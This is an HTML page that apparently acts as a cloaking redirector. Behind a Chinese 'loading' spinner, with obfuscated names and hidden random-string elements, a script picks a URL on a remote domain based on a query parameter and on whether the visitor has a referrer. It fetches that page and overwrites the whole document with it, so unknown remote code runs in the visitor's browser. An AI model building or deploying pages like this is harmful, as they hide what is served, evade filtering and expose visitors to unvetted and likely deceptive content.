<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .iW01ztg {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .iW01ztg .smLqmBCjOti {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .iW01ztg .content {
            line-height: 50px;
            text-align: center
        }

        .iW01ztg .img {
            width: 100%
        }

        .iW01ztg .PNk3tWssQM {
            text-align: center
        }

        .iW01ztg .PNk3tWssQM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .iW01ztg .PNk3tWssQM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .iW01ztg .PNk3tWssQM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .iW01ztg .PNk3tWssQM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .iW01ztg .PNk3tWssQM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .iW01ztg .PNk3tWssQM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .iW01ztg .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function g4NtPAFeS9V7i(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var l91oMVz = g4NtPAFeS9V7i('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ l91oMVz +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ l91oMVz +".html?a=share";
		}
		
        IaIKJu9aBh=url+"#"+new Date().getTime();
        IaIKJu9aBh && function() {
            $.get(IaIKJu9aBh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >Fyoke9fhEcRNBrBcGoKx7pfP</h1>
<b style='display:none' >wQ4fwGOMYW6AVRXhBHKdemeirniCx15MGvu6hIQDMOw60chHdqlUU3sGJlQHe87QVrPv3ArMDq0vPkXNT1vYZyq0gHVg3hTYw</b>
<b style='display:none' >wQ4fwGOMYW6AVRXhBHKdemeirniCx15MGvu6hIQDMOw60chHdqlUU3sGJlQHe87QVrPv3ArMDq0vPkXNT1vYZyq0gHVg3hTYw</b>
<div style='display:none'>Xgff8UspB7bTPTwH3Wmhei7f18TA1ybty4J0QlnAmg0qkocm</div>
<img  src='' style='display:none'><div class="iW01ztg">
    <div class="smLqmBCjOti">
        <div class="PNk3tWssQM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >lE49VGxy0UZjYpt8Ep2NrKjiA5EgrPElr2apR</b>
<h1 style='display:none' >HNM1oIBghavcZnVj5jp37U</h1>
<p  style='display:none'>UgJNUkZkJzqUu1Dscj81Ppaia1Wi</p></body>
</html>